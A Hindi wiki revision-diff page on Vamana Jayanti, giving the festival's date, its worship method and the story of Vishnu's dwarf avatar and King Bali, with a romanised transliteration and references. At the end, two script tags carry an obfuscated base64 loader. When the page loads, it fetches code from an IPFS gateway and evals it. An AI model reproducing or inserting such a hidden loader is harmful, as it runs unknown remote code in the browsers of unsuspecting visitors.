Difference between revisions of "वामन जयन्ती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 1: Line 1:
 
[[चित्र:Vamana.jpg|thumb|[[वामन अवतार]]<br />Vamana Avtar]]
 
[[चित्र:Vamana.jpg|thumb|[[वामन अवतार]]<br />Vamana Avtar]]
{{main|वामन अवतार}}
+
[[भाद्रपद मास|भाद्रपद]] [[मास]] के [[शुक्ल पक्ष]] की [[द्वादशी]] को [[वामन द्वादशी]] या वामन जयंती के रुप में मनाया जाता है। धर्म ग्रंथों के अनुसार इसी शुभ तिथि को [[श्रवण नक्षत्र]] के अभिजित मुहूर्त में [[विष्णु|श्रीविष्णु]] के एक रुप भगवान [[वामन अवतार|वामन का अवतार]] हुआ था। इस तिथि पर मध्याह्न में [[विष्णु]] का [[वामन अवतार]] हुआ था, उस समय [[श्रवण नक्षत्र]] था।<ref>सर्वपापमोचन; गदाधरपद्धति (कालसार, पृष्ठ 147-148); व्रतार्क (पाण्डुलिपि, 244ए से 247ए तक, भविष्योत्तरपुराण से उद्धरण</ref> [[भागवत पुराण]]<ref>भागवतपुराण (8, अध्याय 17-23)। अध्याय 18 (श्लोक 5-6</ref> में ऐसा आया है कि वामन [[श्रावण मास]] की द्वादशी पर प्रकट हुए थे, जबकि [[श्रवण नक्षत्]]र था, मुहूर्त अभिजित था तथा वह तिथि [[विजयद्वादशी]] कही जाती है। हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 1, पृष्ठ 1138-1145, भविष्योत्तरपुराण से उद्धरण</ref> का अधिकांश व्रतार्क से उर्द्धरत है।  
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
==पूजन विधि==
*यह व्रत [[भाद्रपद]] [[शुक्ल पक्ष]] की [[द्वादशी]] पर करना चाहिए।
+
इस दिन प्रात:काल भक्तों को श्रीहरि का स्मरण करने नियमानुसार विधि विधान के साथ पूजा कर्म करना चाहिए। भगवान वामन का पंचोपचार अथवा षोडषोपचार पूजन करने के पश्चात [[चावल]], [[दही]] इत्यादि वस्तुओं का दान करना उत्तम माना गया है। संध्या समय व्रती भगवान वामन का पूजन करना चाहिए और व्रत कथा सुननी चाहिए तथा समस्त परिवार वालों को भगवान का प्रसाद ग्रहण करना चाहिए। इस दिन व्रत एवं पूजन करने से भगवान वामन प्रसन्न होते हैं और भक्तों की समस्त मनोकामनाओं को पूर्ण करते हैं।
*इस तिथि पर मध्याह्न में [[विष्णु]] का [[वामन अवतार]] हुआ था, उस समय [[श्रवण नक्षत्र]] था।<ref>सर्वपापमोचन; गदाधरपद्धति (कालसार, पृष्ठ 147-148); व्रतार्क (पाण्डुलिपि, 244ए से 247ए तक, भविष्योत्तरपुराण से उद्धरण</ref>  
+
==वामन जयंती कथा==
*[[भागवत पुराण]]<ref>भागवतपुराण (8, अध्याय 17-23)। अध्याय 18 (श्लोक 5-6</ref> में ऐसा आया है कि वामन [[श्रावण मास]] की द्वादशी पर प्रकट हुए थे, जबकि श्रवण नक्षत्र था, मुहूर्त अभिजित था तथा वह तिथि [[विजयद्वादशी]] कही जाती है।  
+
<poem>
*हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 1, पृष्ठ 1138-1145, भविष्योत्तरपुराण से उद्धरण</ref> का अधिकांश व्रतार्क से उर्द्धरत है।  
+
          [[वामन अवतार]] भगवान [[विष्णु]] का महत्वपूर्ण [[अवतार]] माना जाता है। भगवान की लीला अनंत है और उसी में से एक वामन अवतार है। इसके विषय में [[भागवत पुराण|श्रीमद्भगवदपुराण]] में विस्तार से उल्लेख है। वामन अवतार कथानुसार देव और दैत्यों के युद्ध में दैत्य पराजित होने लगते हैं। पराजित दैत्य मृत एवं आहतों को लेकर अस्ताचल चले जाते हैं और दूसरी ओर दैत्यराज [[बलि]] [[इन्द्र]] के वज्र से मृत हो जाते हैं तब दैत्यगुरु [[शुक्राचार्य]] अपनी मृत संजीवनी विद्या से बलि और दूसरे दैत्य को भी जीवित एवं स्वस्थ कर देते हैं। राजा बलि के लिए शुक्राचार्य एक [[यज्ञ]] का आयोजन करते हैं तथ [[अग्नि]] से दिव्य रथ, [[बाण]], अभेद्य कवच पाते हैं। इससे असुरों की शक्ति में वृद्धि हो जाती है और असुर सेना [[अमरावती]] पर आक्रमण करने लगती है।
 +
          इंद्र को राजा बलि की इच्छा का ज्ञान होता है कि राजा बलि इस सौ यज्ञ पूरे करने के बाद स्वर्ग को प्राप्त करने में सक्षम हो जाएंगे, तब इन्द्र भगवान विष्णु की शरण में जाते हैं। भगवान विष्णु उनकी सहायता करने का आश्वासन देते हैं और भगवान विष्णु वामन रुप में माता [[अदिति]] के गर्भ से उत्पन्न होने का वचन देते हैं। दैत्यराज बलि द्वारा देवों के पराभव के बाद [[कश्यप|ऋषि कश्यप]] के कहने से माता अदिति पयोव्रत का अनुष्ठान करती हैं जो पुत्र प्राप्ति के लिए किया जाता है। तब [[भाद्रपद मास]] की [[शुक्ल पक्ष]] की [[द्वादशी]] के दिन माता अदिति के गर्भ से प्रकट हो अवतार लेते हैं तथा ब्रह्मचारी [[ब्राह्मण]] का रूप धारण करते हैं।
 +
          महर्षि कश्यप ऋषियों के साथ उनका [[उपनयन संस्कार]] करते हैं। वामन बटुक को महर्षि [[पुलह]] ने यज्ञोपवीत, [[अगस्त्य]] ने मृगचर्म, [[मरीचि]] ने पलाश दण्ड, [[आंगिरस]] ने वस्त्र, [[सूर्य]] ने छत्र, [[भृगु]] ने खड़ाऊं, गुरु देव जनेऊ तथा कमण्डल, अदिति ने कोपीन, [[सरस्वती देवी|सरस्वती]] ने रुद्राक्ष माला तथा [[कुबेर]] ने भिक्षा पात्र प्रदान किए। तत्पश्चात भगवान वामन [[पिता]] से आज्ञा लेकर बलि के पास जाते हैं। उस समय राजा बलि [[नर्मदा नदी|नर्मदा]] के उत्तर-तट पर अन्तिम यज्ञ कर रहे होते हैं।
 +
          वामन अवतारी श्रीहरि, राजा बलि के यहां भिक्षा मांगने पहुंच जाते हैं। ब्राह्मण बने विष्णु भिक्षा में तीन पग भूमि मांगते हैं। राजा बलि दैत्यगुरु शुक्राचार्य के मना करने पर भी अपने वचन पर अडिग रहते हुए, विष्णु को तीन पग भूमि दान में देने का वचन कर देते हैं। वामन रुप में भगवान एक पग में स्वर्गादि उर्ध्व लोकों को ओर दूसरे पग में पृथ्वी को नाप लेते हैं। अब तीसरा पग रखने को कोई स्थान नहीं रह जाता है। बलि के सामने संकट उत्पन्न हो गया। ऐसे में राजा बलि यदि अपना वचन नहीं निभाए तो अधर्म होगा। आखिरकार बलि अपना सिर भगवान के आगे कर देता है और कहता है तीसरा पग आप मेरे सिर पर रख दीजिए। वामन भगवान ने ठीक वैसा ही करते हैं और बलि को पाताल लोक में रहने का आदेश करते हैं। बलि सहर्ष भवदाज्ञा को शिरोधार्य करता है। बलि के द्वारा वचन पालन करने पर, भगवान विष्णु अत्यन्त प्रसन्न होते हैं और दैत्यराज बलि को वर माँगने को कहते हैं। इसके बदले में बलि रात-दिन भगवान को अपने सामने रहने का वचन मांग लेता है, श्रीविष्णु को अपना वचन का पालन करते हुए, [[पाताल लोक]] में राजा बलि का द्वारपाल बनना स्वीकार करते हैं।<ref>{{cite web |url=http://abhinavvashishtha.blogspot.in/2012/09/26912.html |title=वामन जयंती  |accessmonthday=13 जनवरी |accessyear=2013 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=समग्र उन्ननयन (ब्लॉग)|language=हिंदी }}</ref></poem>
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 14:11, 14 January 2013

[[chitr:Vamana.jpg|thumb|vaman avatar
Vamana Avtar]] bhadrapad mas ke shukl paksh ki dvadashi ko vaman dvadashi ya vaman jayanti ke rup mean manaya jata hai. dharm granthoan ke anusar isi shubh tithi ko shravan nakshatr ke abhijit muhoort mean shrivishnu ke ek rup bhagavan vaman ka avatar hua tha. is tithi par madhyahn mean vishnu ka vaman avatar hua tha, us samay shravan nakshatr tha.[1] bhagavat puran[2] mean aisa aya hai ki vaman shravan mas ki dvadashi par prakat hue the, jabaki shravan nakshathr tha, muhoort abhijit tha tatha vah tithi vijayadvadashi kahi jati hai. hemadri[3] ka adhikaansh vratark se urddharat hai.

poojan vidhi

is din prat:kal bhaktoan ko shrihari ka smaran karane niyamanusar vidhi vidhan ke sath pooja karm karana chahie. bhagavan vaman ka panchopachar athava shodashopachar poojan karane ke pashchat chaval, dahi ityadi vastuoan ka dan karana uttam mana gaya hai. sandhya samay vrati bhagavan vaman ka poojan karana chahie aur vrat katha sunani chahie tatha samast parivar valoan ko bhagavan ka prasad grahan karana chahie. is din vrat evan poojan karane se bhagavan vaman prasann hote haian aur bhaktoan ki samast manokamanaoan ko poorn karate haian.

vaman jayanti katha

          vaman avatar bhagavan vishnu ka mahatvapoorn avatar mana jata hai. bhagavan ki lila anant hai aur usi mean se ek vaman avatar hai. isake vishay mean shrimadbhagavadapuran mean vistar se ullekh hai. vaman avatar kathanusar dev aur daityoan ke yuddh mean daity parajit hone lagate haian. parajit daity mrit evan ahatoan ko lekar astachal chale jate haian aur doosari or daityaraj bali indr ke vajr se mrit ho jate haian tab daityaguru shukrachary apani mrit sanjivani vidya se bali aur doosare daity ko bhi jivit evan svasth kar dete haian. raja bali ke lie shukrachary ek yajn ka ayojan karate haian tath agni se divy rath, ban, abhedy kavach pate haian. isase asuroan ki shakti mean vriddhi ho jati hai aur asur sena amaravati par akraman karane lagati hai.
          iandr ko raja bali ki ichchha ka jnan hota hai ki raja bali is sau yajn poore karane ke bad svarg ko prapt karane mean saksham ho jaeange, tab indr bhagavan vishnu ki sharan mean jate haian. bhagavan vishnu unaki sahayata karane ka ashvasan dete haian aur bhagavan vishnu vaman rup mean mata aditi ke garbh se utpann hone ka vachan dete haian. daityaraj bali dvara devoan ke parabhav ke bad rrishi kashyap ke kahane se mata aditi payovrat ka anushthan karati haian jo putr prapti ke lie kiya jata hai. tab bhadrapad mas ki shukl paksh ki dvadashi ke din mata aditi ke garbh se prakat ho avatar lete haian tatha brahmachari brahman ka roop dharan karate haian.
           maharshi kashyap rrishiyoan ke sath unaka upanayan sanskar karate haian. vaman batuk ko maharshi pulah ne yajnopavit, agasty ne mrigacharm, marichi ne palash dand, aangiras ne vastr, soory ne chhatr, bhrigu ne kh daooan, guru dev janeoo tatha kamandal, aditi ne kopin, sarasvati ne rudraksh mala tatha kuber ne bhiksha patr pradan kie. tatpashchat bhagavan vaman pita se ajna lekar bali ke pas jate haian. us samay raja bali narmada ke uttar-tat par antim yajn kar rahe hote haian.
          vaman avatari shrihari, raja bali ke yahaan bhiksha maangane pahuanch jate haian. brahman bane vishnu bhiksha mean tin pag bhoomi maangate haian. raja bali daityaguru shukrachary ke mana karane par bhi apane vachan par adig rahate hue, vishnu ko tin pag bhoomi dan mean dene ka vachan kar dete haian. vaman rup mean bhagavan ek pag mean svargadi urdhv lokoan ko or doosare pag mean prithvi ko nap lete haian. ab tisara pag rakhane ko koee sthan nahian rah jata hai. bali ke samane sankat utpann ho gaya. aise mean raja bali yadi apana vachan nahian nibhae to adharm hoga. akhirakar bali apana sir bhagavan ke age kar deta hai aur kahata hai tisara pag ap mere sir par rakh dijie. vaman bhagavan ne thik vaisa hi karate haian aur bali ko patal lok mean rahane ka adesh karate haian. bali saharsh bhavadajna ko shirodhary karata hai. bali ke dvara vachan palan karane par, bhagavan vishnu atyant prasann hote haian aur daityaraj bali ko var maangane ko kahate haian. isake badale mean bali rat-din bhagavan ko apane samane rahane ka vachan maang leta hai, shrivishnu ko apana vachan ka palan karate hue, patal lok mean raja bali ka dvarapal banana svikar karate haian.[4]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. sarvapapamochan; gadadharapaddhati (kalasar, prishth 147-148); vratark (pandulipi, 244e se 247e tak, bhavishyottarapuran se uddharan
  2. bhagavatapuran (8, adhyay 17-23). adhyay 18 (shlok 5-6
  3. hemadri (vratakhand 1, prishth 1138-1145, bhavishyottarapuran se uddharan
  4. vaman jayanti (hiandi) (ech.ti.em.el) samagr unnanayan (bl aaug). abhigaman tithi: 13 janavari, 2013.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>